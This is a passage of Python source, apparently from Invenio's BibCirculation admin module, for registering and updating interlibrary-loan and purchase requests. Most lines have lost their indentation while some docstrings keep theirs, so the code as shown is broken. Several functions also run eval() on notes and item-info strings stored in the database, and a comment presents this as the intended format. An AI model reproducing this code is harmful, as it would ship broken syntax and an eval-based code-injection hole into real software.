'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
request_details = (budget_code, period_of_interest_from,
period_of_interest_to, additional_comments, only_edition)
book_info = (title, authors, place, publisher, year, edition, isbn)
if user_info is None:
return register_ill_request_with_no_recid_step2(req, title, authors,
place, publisher, year, edition, isbn, budget_code,
period_of_interest_from, period_of_interest_to,
additional_comments, only_edition, 'name', None,
None, ln)
else:
body = bc_templates.tmpl_register_ill_request_with_no_recid_step3(
book_info=book_info,
user_info=user_info,
request_details=request_details,
admin=True,
ln=ln)
return page(title=_("Register ILL request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_ill_request_with_no_recid_step4(req, book_info, borrower_id,
request_details, ln):
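    """
    Register an ILL request with no recid. Step 4: persist the request.
    @type book_info: tuple.
    @param book_info: (title, authors, place, publisher, year, edition, isbn).
    @type request_details: tuple.
    @param request_details: (budget_code, period_of_interest_from,
                             period_of_interest_to, library_notes,
                             only_edition).
    """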
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
_ = gettext_set_language(ln)
(title, authors, place, publisher, year, edition, isbn) = book_info
    #create_ill_record(book_info)
(budget_code, period_of_interest_from,
period_of_interest_to, library_notes, only_edition) = request_details
ill_request_notes = {}
if library_notes:
ill_request_notes[time.strftime("%Y-%m-%d %H:%M:%S")] = \
str(library_notes)
### budget_code ###
    if db.get_borrower_data_by_id(borrower_id) is None:
_ = gettext_set_language(ln)
infos = []
infos.append(_("<strong>Request not registered:</strong> wrong borrower id"))
body = bc_templates.tmpl_register_ill_request_with_no_recid_step2(
book_info=book_info,
request_details=request_details, result=[],
key='name', string=None, infos=infos, ln=ln)
return page(title=_("Register ILL request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
else:
book_info = {'title': title, 'authors': authors, 'place': place,
                     'publisher': publisher, 'year': year, 'edition': edition,
                     'isbn': isbn}
db.ill_register_request_on_desk(borrower_id, book_info,
period_of_interest_from,
period_of_interest_to,
CFG_BIBCIRCULATION_ILL_STATUS_NEW,
str(ill_request_notes),
only_edition, 'book', budget_code)
return list_ill_request(req, CFG_BIBCIRCULATION_ILL_STATUS_NEW, ln)
def register_ill_book_request(req, borrower_id, ln=CFG_SITE_LANG):
"""
    Display a form where it is possible to search for an item.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
_ = gettext_set_language(ln)
infos = []
body = bc_templates.tmpl_register_ill_book_request(infos=infos,
borrower_id=borrower_id,
ln=ln)
return page(title=_("Register ILL Book request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_ill_book_request_result(req, borrower_id, p, f, ln=CFG_SITE_LANG):
"""
    Search for an item and return a list with all the possible results. To retrieve
the information desired, we use the method 'perform_request_search' (from
search_engine.py). In the case of BibCirculation, we are just looking for
books (items) inside the collection 'Books'.
@type p: string
@param p: search pattern
@type f: string
@param f: search field
@return: list of recids
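
    Example (illustrative; the barcode value is hypothetical): a barcode
    search strips quoting characters before the lookup:
        recid = db.get_id_bibrec("'CM-B00012345'".strip('\'" \t'))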
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if p == '':
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_register_ill_book_request(infos=infos,
borrower_id=borrower_id,
ln=ln)
else:
if f == 'barcode':
p = p.strip('\'" \t')
recid = db.get_id_bibrec(p)
if recid is None:
infos.append(_('The barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s does not exist on BibCirculation database.') % {'x_barcode': p, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_register_ill_book_request(infos=infos,
borrower_id=borrower_id,
ln=ln)
else:
body = bc_templates.tmpl_register_ill_book_request_result(
result=[recid],
borrower_id=borrower_id,
ln=ln)
else:
result = perform_request_search(cc="Books", sc="1", p=p, f=f)
if len(result) == 0:
return register_ill_request_with_no_recid_step1(req,
borrower_id, ln)
else:
body = bc_templates.tmpl_register_ill_book_request_result(
result=result,
borrower_id=borrower_id,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return page(title=_("Register ILL Book request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_ill_article_request_step1(req, ln=CFG_SITE_LANG):
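    """
    Register an ILL article request. Step 1: display the request form.
    """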
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
body = bc_templates.tmpl_register_ill_article_request_step1(infos=infos,
ln=ln)
return page(title=_("Register ILL Article request"),
uid=id_user,
req=req,
body=body,
metaheaderadd = "<link rel=\"stylesheet\" href=\"%s/vendors/jquery-ui/themes/redmond/jquery-ui.css\" type=\"text/css\" />"%(CFG_SITE_SECURE_URL),
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_ill_article_request_step2(req, periodical_title, article_title,
author, report_number, volume, issue,
pages, year, budget_code, issn,
period_of_interest_from,
period_of_interest_to,
additional_comments, key, string,
ln=CFG_SITE_LANG):
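    """
    Register an ILL article request. Step 2: validate the dates and search
    for the borrower who will be attached to the request.
    """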
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if key and not string:
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
article_info = (periodical_title, article_title, author, report_number,
volume, issue, pages, year, issn)
request_details = (period_of_interest_from, period_of_interest_to,
budget_code, additional_comments)
body = bc_templates.tmpl_register_ill_article_request_step2(
article_info=article_info,
request_details=request_details,
result=None, key=key,
string=string, infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return page(title=_("Register ILL request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
result = search_user(key, string)
borrowers_list = []
if len(result) == 0 and key:
if CFG_CERN_SITE:
infos.append(_("0 borrowers found.") + ' ' +_("Search by CCID."))
else:
new_borrower_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/add_new_borrower_step1',
{'ln': ln}, _("Register new borrower."))
message = _("0 borrowers found.") + ' ' + new_borrower_link
infos.append(message)
else:
for user in result:
borrower_data = db.get_borrower_data_by_id(user[0])
borrowers_list.append(borrower_data)
if validate_date_format(period_of_interest_from) is False:
infos = []
infos.append(_("The period of interest %(x_strong_tag_open)sFrom: %(x_date)s%(x_strong_tag_close)s is not a valid date or date format") % {'x_date': period_of_interest_from, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_register_ill_article_request_step1(infos=infos,
ln=ln)
elif validate_date_format(period_of_interest_to) is False:
infos = []
infos.append(_("The period of interest %(x_strong_tag_open)sTo: %(x_date)s%(x_strong_tag_close)s is not a valid date or date format") % {'x_date': period_of_interest_to, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_register_ill_article_request_step1(infos=infos,
ln=ln)
else:
article_info = (periodical_title, article_title, author, report_number,
volume, issue, pages, year, issn)
request_details = (period_of_interest_from, period_of_interest_to,
budget_code, additional_comments)
body = bc_templates.tmpl_register_ill_article_request_step2(
article_info=article_info,
request_details=request_details,
result=borrowers_list,
key=key, string=string,
infos=infos, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return invenio.webpage.page(title=_("Register ILL request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_ill_article_request_step3(req, periodical_title, title, authors,
report_number, volume, issue,
page_number, year, issn, user_info,
request_details, ln=CFG_SITE_LANG):
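    """
    Register an ILL article request. Step 3: persist the request on desk.
    @type request_details: tuple.
    @param request_details: (period_of_interest_from, period_of_interest_to,
                             budget_code, library_notes).
    """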
#id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
#info = (title, authors, "", "", year, "", issn)
#create_ill_record(info)
item_info = {'periodical_title': periodical_title, 'title': title,
'authors': authors, 'place': "", 'publisher': "",
'year' : year, 'edition': "", 'issn' : issn,
'volume': volume, 'issue': issue, 'page': page_number }
(period_of_interest_from, period_of_interest_to, budget_code,
library_notes) = request_details
only_edition = ""
if user_info is None:
return register_ill_article_request_step2(req, periodical_title, title,
authors, report_number, volume, issue,
page_number, year, budget_code, issn,
period_of_interest_from,
period_of_interest_to,
library_notes, 'name', None, ln)
else:
borrower_id = user_info[0]
ill_request_notes = {}
if library_notes:
ill_request_notes[time.strftime("%Y-%m-%d %H:%M:%S")] \
= str(library_notes)
db.ill_register_request_on_desk(borrower_id, item_info,
period_of_interest_from,
period_of_interest_to,
CFG_BIBCIRCULATION_ILL_STATUS_NEW,
str(ill_request_notes),
only_edition, 'article', budget_code)
return list_ill_request(req, CFG_BIBCIRCULATION_ILL_STATUS_NEW, ln)
def register_purchase_request_step1(req, request_type, recid, title, authors,
place, publisher, year, edition, this_edition_only,
isbn, standard_number,
budget_code, cash, period_of_interest_from,
period_of_interest_to, additional_comments,
ln=CFG_SITE_LANG):
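    """
    Register a purchase request. Step 1: display the request form.
    """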
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
if recid:
fields = (request_type, recid, budget_code, cash,
period_of_interest_from, period_of_interest_to,
additional_comments)
else:
fields = (request_type, title, authors, place, publisher, year, edition,
this_edition_only, isbn, standard_number, budget_code,
cash, period_of_interest_from, period_of_interest_to,
additional_comments)
body = bc_templates.tmpl_register_purchase_request_step1(infos=infos,
fields=fields, admin=True, ln=ln)
return page(title=_("Register purchase request"),
uid=id_user,
req=req,
body=body,
language=ln,
metaheaderadd='<link rel="stylesheet" ' \
'href="%s/vendors/jquery-ui/themes/redmond/jquery-ui.css" ' \
'type="text/css" />' % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_purchase_request_step2(req, request_type, recid, title, authors,
place, publisher, year, edition, this_edition_only,
isbn, standard_number,
budget_code, cash, period_of_interest_from,
period_of_interest_to, additional_comments,
p, f, ln=CFG_SITE_LANG):
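    """
    Register a purchase request. Step 2: validate the payment information
    and search for the borrower who will be attached to the request.
    """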
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
infos = []
if cash and budget_code == '':
budget_code = 'cash'
if recid:
fields = (request_type, recid, budget_code, cash,
period_of_interest_from, period_of_interest_to,
additional_comments)
else:
fields = (request_type, title, authors, place, publisher, year, edition,
this_edition_only, isbn, standard_number, budget_code,
cash, period_of_interest_from, period_of_interest_to,
additional_comments)
if budget_code == '' and not cash:
infos.append(_("Payment method information is mandatory. \
Please, type your budget code or tick the 'cash' checkbox."))
body = bc_templates.tmpl_register_purchase_request_step1(infos=infos,
fields=fields, admin=True, ln=ln)
else:
########################
########################
if p and not f:
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_register_purchase_request_step2(
infos=infos, fields=fields,
result=None, p=p, f=f, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return page(title=_("Register ILL request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
result = search_user(f, p)
borrowers_list = []
if len(result) == 0 and f:
if CFG_CERN_SITE:
infos.append(_("0 borrowers found.") + ' ' +_("Search by CCID."))
else:
new_borrower_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/add_new_borrower_step1',
{'ln': ln}, _("Register new borrower."))
message = _("0 borrowers found.") + ' ' + new_borrower_link
infos.append(message)
else:
for user in result:
borrower_data = db.get_borrower_data_by_id(user[0])
borrowers_list.append(borrower_data)
body = bc_templates.tmpl_register_purchase_request_step2(
infos=infos, fields=fields,
result=borrowers_list, p=p,
f=f, ln=ln)
########################
########################
return page(title=_("Register purchase request"),
uid=id_user,
req=req,
body=body,
language=ln,
metaheaderadd='<link rel="stylesheet" ' \
'href="%s/vendors/jquery-ui/themes/redmond/jquery-ui.css" ' \
'type="text/css" />' % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_purchase_request_step3(req, request_type, recid, title, authors,
place, publisher, year, edition, this_edition_only,
isbn, standard_number,
budget_code, cash, period_of_interest_from,
period_of_interest_to, additional_comments,
borrower_id, ln=CFG_SITE_LANG):
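    """
    Register a purchase request. Step 3: validate the payment information,
    persist the request and notify the borrower by email.
    """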
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
infos = []
if recid:
fields = (request_type, recid, budget_code, cash,
period_of_interest_from, period_of_interest_to,
additional_comments)
else:
fields = (request_type, title, authors, place, publisher, year, edition,
this_edition_only, isbn, standard_number, budget_code,
cash, period_of_interest_from, period_of_interest_to,
additional_comments)
if budget_code == '' and not cash:
infos.append(_("Payment method information is mandatory. \
Please, type your budget code or tick the 'cash' checkbox."))
body = bc_templates.tmpl_register_purchase_request_step1(infos=infos,
fields=fields, admin=True, ln=ln)
else:
if recid:
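            # Serialize the item info of a known record as a stringified
            # dict; consumers later recover it with looks_like_dictionary()
            # and eval(), mirroring the notes format used elsewhere.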
item_info = "{'recid': " + str(recid) + "}"
title = book_title_from_MARC(recid)
else:
item_info = {'title': title, 'authors': authors, 'place': place,
                         'publisher': publisher, 'year': year, 'edition': edition,
                         'isbn': isbn, 'standard_number': standard_number}
ill_request_notes = {}
if additional_comments:
ill_request_notes[time.strftime("%Y-%m-%d %H:%M:%S")] \
= str(additional_comments)
if cash and budget_code == '':
budget_code = 'cash'
if borrower_id:
borrower_email = db.get_borrower_email(borrower_id)
else:
borrower_email = db.get_invenio_user_email(id_user)
borrower_id = db.get_borrower_id_by_email(borrower_email)
db.ill_register_request_on_desk(borrower_id, item_info,
period_of_interest_from,
period_of_interest_to,
CFG_BIBCIRCULATION_ACQ_STATUS_NEW,
str(ill_request_notes),
this_edition_only, request_type, budget_code)
msg_for_user = load_template('purchase_notification') % title
send_email(fromaddr = CFG_BIBCIRCULATION_ILLS_EMAIL,
toaddr = borrower_email,
subject = _("Your book purchase request"),
header = '', footer = '',
content = msg_for_user,
attempt_times=1,
attempt_sleeptime=10
)
return redirect_to_url(req,
'%s/admin2/bibcirculation/list_purchase?ln=%s&status=%s' % \
(CFG_SITE_SECURE_URL, ln,
CFG_BIBCIRCULATION_ACQ_STATUS_NEW))
return page(title=_("Register purchase request"),
uid=id_user,
req=req,
body=body,
language=ln,
metaheaderadd='<link rel="stylesheet" ' \
'href="%s/vendors/jquery-ui/themes/redmond/jquery-ui.css" ' \
'type="text/css" />' % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def ill_request_details_step1(req, delete_key, ill_request_id, new_status,
ln=CFG_SITE_LANG):
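    """
    Display the details of an ILL request and, optionally, delete a note or
    update its status.
    """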
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if delete_key and ill_request_id:
if looks_like_dictionary(db.get_ill_request_notes(ill_request_id)):
library_notes = eval(db.get_ill_request_notes(ill_request_id))
if delete_key in library_notes.keys():
del library_notes[delete_key]
db.update_ill_request_notes(ill_request_id, library_notes)
if new_status:
db.update_ill_request_status(ill_request_id, new_status)
ill_request_borrower_details = \
db.get_ill_request_borrower_details(ill_request_id)
if ill_request_borrower_details is None \
or len(ill_request_borrower_details) == 0:
infos.append(_("Borrower request details not found."))
ill_request_details = db.get_ill_request_details(ill_request_id)
if ill_request_details is None or len(ill_request_details) == 0:
infos.append(_("Request not found."))
libraries = db.get_external_libraries()
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
title = _("ILL request details")
if infos == []:
body = bc_templates.tmpl_ill_request_details_step1(
ill_request_id=ill_request_id,
ill_request_details=ill_request_details,
libraries=libraries,
ill_request_borrower_details=ill_request_borrower_details,
ln=ln)
else:
body = bc_templates.tmpl_display_infos(infos, ln)
return page(title=title,
uid=id_user,
req=req,
metaheaderadd='<link rel="stylesheet" ' \
'href="%s/vendors/jquery-ui/themes/redmond/jquery-ui.css" ' \
'type="text/css" />' % CFG_SITE_SECURE_URL,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def ill_request_details_step2(req, delete_key, ill_request_id, new_status,
library_id, request_date, expected_date,
arrival_date, due_date, return_date,
cost, _currency, barcode, library_notes,
book_info, article_info, ln=CFG_SITE_LANG):
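    """
    Update an ILL request. Step 2: store the edited notes, dates, status and
    item info; when a book arrives, redirect to the borrower notification
    email template.
    """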
#id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if delete_key and ill_request_id:
if looks_like_dictionary(db.get_ill_request_notes(ill_request_id)):
library_previous_notes = eval(db.get_ill_request_notes(ill_request_id))
if delete_key in library_previous_notes.keys():
del library_previous_notes[delete_key]
db.update_ill_request_notes(ill_request_id, library_previous_notes)
if db.get_ill_request_notes(ill_request_id):
if looks_like_dictionary(db.get_ill_request_notes(ill_request_id)):
library_previous_notes = eval(db.get_ill_request_notes(ill_request_id))
else:
library_previous_notes = {}
else:
library_previous_notes = {}
if library_notes:
library_previous_notes[time.strftime("%Y-%m-%d %H:%M:%S")] = \
str(library_notes)
if new_status == CFG_BIBCIRCULATION_LOAN_STATUS_RETURNED:
borrower_id = db.get_ill_borrower(ill_request_id)
barcode = db.get_ill_barcode(ill_request_id)
db.update_ill_loan_status(borrower_id, barcode, return_date, 'ill')
db.update_ill_request(ill_request_id, library_id, request_date,
expected_date, arrival_date, due_date, return_date,
new_status, cost, barcode,
str(library_previous_notes))
request_type = db.get_ill_request_type(ill_request_id)
if request_type == 'book':
item_info = book_info
else:
item_info = article_info
db.update_ill_request_item_info(ill_request_id, item_info)
if new_status == CFG_BIBCIRCULATION_ILL_STATUS_ON_LOAN:
# Redirect to an email template when the ILL 'book' arrives
# (Not for articles.)
subject = _("ILL received: ")
book_info = db.get_ill_book_info(ill_request_id)
if looks_like_dictionary(book_info):
book_info = eval(book_info)
if 'recid' in book_info:
subject += "'" + book_title_from_MARC(int(book_info['recid'])) + "'"
bid = db.get_ill_borrower(ill_request_id)
msg = load_template("ill_received")
return redirect_to_url(req,
create_url(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/borrower_notification',
{'borrower_id': bid,
'subject': subject,
'load_msg_template': False,
'template': msg,
'from_address': CFG_BIBCIRCULATION_ILLS_EMAIL
}
)
)
return list_ill_request(req, new_status, ln)
def purchase_details_step1(req, delete_key, ill_request_id, new_status,
ln=CFG_SITE_LANG):
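    """
    Display the details of a purchase/proposal request and, optionally,
    delete a note or update its status.
    """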
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if delete_key and ill_request_id:
if looks_like_dictionary(db.get_ill_request_notes(ill_request_id)):
library_notes = eval(db.get_ill_request_notes(ill_request_id))
if delete_key in library_notes.keys():
del library_notes[delete_key]
db.update_ill_request_notes(ill_request_id, library_notes)
if new_status:
db.update_ill_request_status(ill_request_id, new_status)
ill_request_borrower_details = \
db.get_purchase_request_borrower_details(ill_request_id)
if ill_request_borrower_details is None \
or len(ill_request_borrower_details) == 0:
infos.append(_("Borrower request details not found."))
ill_request_details = db.get_ill_request_details(ill_request_id)
if ill_request_details is None or len(ill_request_details) == 0:
infos.append(_("Request not found."))
vendors = db.get_all_vendors()
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
    title = _("Purchase details")
    if infos == []:
        body = bc_templates.tmpl_purchase_details_step1(
                                ill_request_id=ill_request_id,
                                ill_request_details=ill_request_details,
                                libraries=vendors,
                                ill_request_borrower_details=ill_request_borrower_details,
                                ln=ln)
    else:
        body = bc_templates.tmpl_display_infos(infos, ln)
return page(title=title,
uid=id_user,
req=req,
metaheaderadd = "<link rel=\"stylesheet\" href=\"%s/vendors/jquery-ui/themes/redmond/jquery-ui.css\" type=\"text/css\" />" % CFG_SITE_SECURE_URL,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def purchase_details_step2(req, delete_key, ill_request_id, new_status,
library_id, request_date, expected_date,
arrival_date, due_date, return_date,
cost, budget_code, library_notes,
item_info, ln=CFG_SITE_LANG):
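    """
    Update a purchase/proposal request. Step 2: store the edited notes,
    dates and status, then redirect to the appropriate list or to the
    borrower notification email template.
    """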
#id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if delete_key and ill_request_id:
if looks_like_dictionary(db.get_ill_request_notes(ill_request_id)):
library_previous_notes = eval(db.get_ill_request_notes(ill_request_id))
if delete_key in library_previous_notes.keys():
del library_previous_notes[delete_key]
db.update_ill_request_notes(ill_request_id, library_previous_notes)
if db.get_ill_request_notes(ill_request_id):
if looks_like_dictionary(db.get_ill_request_notes(ill_request_id)):
library_previous_notes = eval(db.get_ill_request_notes(ill_request_id))
else:
library_previous_notes = {}
else:
library_previous_notes = {}
if library_notes:
library_previous_notes[time.strftime("%Y-%m-%d %H:%M:%S")] = \
str(library_notes)
if new_status == CFG_BIBCIRCULATION_LOAN_STATUS_RETURNED:
borrower_id = db.get_ill_borrower(ill_request_id)
db.update_purchase_request(ill_request_id, library_id, request_date,
expected_date, arrival_date, due_date, return_date,
new_status, cost, budget_code,
str(library_previous_notes))
request_type = db.get_ill_request_type(ill_request_id)
if request_type not in CFG_BIBCIRCULATION_PROPOSAL_TYPE:
db.update_ill_request_item_info(ill_request_id, item_info)
if new_status in (CFG_BIBCIRCULATION_PROPOSAL_STATUS_ON_ORDER,
CFG_BIBCIRCULATION_PROPOSAL_STATUS_PUT_ASIDE):
barcode = db.get_ill_barcode(ill_request_id)
if new_status == CFG_BIBCIRCULATION_PROPOSAL_STATUS_ON_ORDER:
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_ORDER, barcode)
subject = _("Book suggestion accepted: ")
template = "proposal_acceptance"
else:
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_UNDER_REVIEW, barcode)
subject = _("Book suggestion refused: ")
template = "proposal_refusal"
book_info = db.get_ill_book_info(ill_request_id)
if looks_like_dictionary(book_info):
book_info = eval(book_info)
if 'recid' in book_info:
bid = db.get_ill_borrower(ill_request_id)
if db.has_loan_request(bid, book_info['recid']):
subject += "'" + book_title_from_MARC(int(book_info['recid'])) + "'"
return redirect_to_url(req,
create_url(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/borrower_notification',
{'borrower_id': bid,
'subject': subject,
'template': template,
'from_address': CFG_BIBCIRCULATION_ILLS_EMAIL
}
)
)
if new_status == CFG_BIBCIRCULATION_PROPOSAL_STATUS_RECEIVED:
barcode = db.get_ill_barcode(ill_request_id)
# Reset the item description to the default value.
db.set_item_description(barcode, '-')
#db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_IN_PROCESS, barcode)
borrower_id = db.get_ill_borrower(ill_request_id)
recid = db.get_id_bibrec(barcode)
if db.has_loan_request(borrower_id, recid):
#If an ILL has already been created(After the book had been put aside), there
#would be no waiting request by the proposer.
db.update_loan_request_status(CFG_BIBCIRCULATION_REQUEST_STATUS_WAITING,
barcode=barcode,
borrower_id=borrower_id)
return redirect_to_url(req,
'%s/admin2/bibcirculation/update_item_info_step4?barcode=%s' % \
(CFG_SITE_SECURE_URL, barcode))
if new_status == CFG_BIBCIRCULATION_ACQ_STATUS_RECEIVED:
subject = _("Purchase received: ")
book_info = db.get_ill_book_info(ill_request_id)
if looks_like_dictionary(book_info):
book_info = eval(book_info)
if 'recid' in book_info:
subject += "'" + book_title_from_MARC(int(book_info['recid'])) + "'"
bid = db.get_ill_borrower(ill_request_id)
if budget_code == 'cash':
msg = load_template("purchase_received_cash") % cost
else:
msg = load_template("purchase_received_tid") % cost
return redirect_to_url(req,
create_url(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/borrower_notification',
{'borrower_id': bid,
'subject': subject,
'load_msg_template': False,
'template': msg,
'from_address': CFG_BIBCIRCULATION_ILLS_EMAIL
}
)
)
if new_status in CFG_BIBCIRCULATION_ACQ_STATUS or \
new_status == CFG_BIBCIRCULATION_PROPOSAL_STATUS_ON_ORDER:
# The items 'on order' whether for acquisition for the library or purchase
# on behalf of the user are displayed in the same list.
return redirect_to_url(req,
'%s/admin2/bibcirculation/list_purchase?ln=%s&status=%s' % \
(CFG_SITE_SECURE_URL, ln, new_status))
else:
return redirect_to_url(req,
'%s/admin2/bibcirculation/list_proposal?ln=%s&status=%s' % \
(CFG_SITE_SECURE_URL, ln, new_status))
def get_ill_library_notes(req, ill_id, delete_key, library_notes,
ln=CFG_SITE_LANG):
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if delete_key and ill_id:
if looks_like_dictionary(db.get_ill_notes(ill_id)):
ill_notes = eval(db.get_ill_notes(ill_id))
if delete_key in ill_notes.keys():
del ill_notes[delete_key]
db.update_ill_notes(ill_id, ill_notes)
elif library_notes:
if db.get_ill_notes(ill_id):
if looks_like_dictionary(db.get_ill_notes(ill_id)):
ill_notes = eval(db.get_ill_notes(ill_id))
else:
ill_notes = {}
else:
ill_notes = {}
ill_notes[time.strftime("%Y-%m-%d %H:%M:%S")] = str(library_notes)
db.update_ill_notes(ill_id, ill_notes)
ill_notes = db.get_ill_notes(ill_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_ill_notes(ill_notes=ill_notes,
ill_id=ill_id,
ln=ln)
return page(title=_("ILL notes"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
